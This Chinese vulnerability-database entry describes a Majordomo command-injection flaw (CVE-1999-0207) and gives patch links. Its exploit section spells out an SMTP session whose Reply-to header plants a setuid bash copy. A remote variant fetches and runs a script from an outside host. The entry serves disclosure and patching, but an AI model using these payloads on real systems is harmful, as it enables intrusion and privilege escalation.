添加时间:
2005-08-11

系统编号:
WAVDB-00102
BugCVE: CVE-1999-0207
BUGTRAQ: 2310

影响版本:
Majordomo 1.89-1.90

程序介绍:

Majordomo是一个流行的用Perl实现的（majordomo.pl）处理邮件列表的软件。

漏洞分析:

1.94.3版本以下的Majordomo对邮件地址未做充分过滤，远程攻击者通过构造特殊的邮件地址可以在服务器上以Majordomo用户的权限执行任意命令。

漏洞利用:

Local exploit:
--exploit--
telnet localhost 25

helo localhost
mail from: user
rcpt to: majordomo (or whatever the name of the majordomo user is)
data
From: user
To: majordomo
Reply-to: a~.`/bin/cp\${IFS}/bin/bash\${IFS}/tmp/lord&&/bin/chmod\${IFS}4777\${IFS}/tmp/lord`.q~a/ad=cucu/c=blu\\\@kappa.ro

LISTS
.
quit
--end of exploit --

For the remote users, change the Reply-to field to something like:

Reply-to: a~.`/usr/bin/rcp\${IFS}user@evil.com:script\${IFS}/tmp/script&&source\${IFS}/tmp/script`.q~a/ad=cucu/c=blu\\\@kappa.ro

解决方案:
厂商补丁：
Great Circle Associates
-----------------------
目前厂商已经在新版本的软件中修复了这个安全问题，请到厂商的主页下载：
http://www.greatcircle.com/majordomo/

信息来源:
<*来源：Razvan Dragomirescu （drazvan@kappa.ro）
链接：http://www.greatcircle.com/majordomo/OLD/majordomo.SECURITY_PATCH
http://bugtraq.inet-one.com/dir.1997-08/msg00105.html
http://www.cert.org/advisories/CA-1994-11.html
*>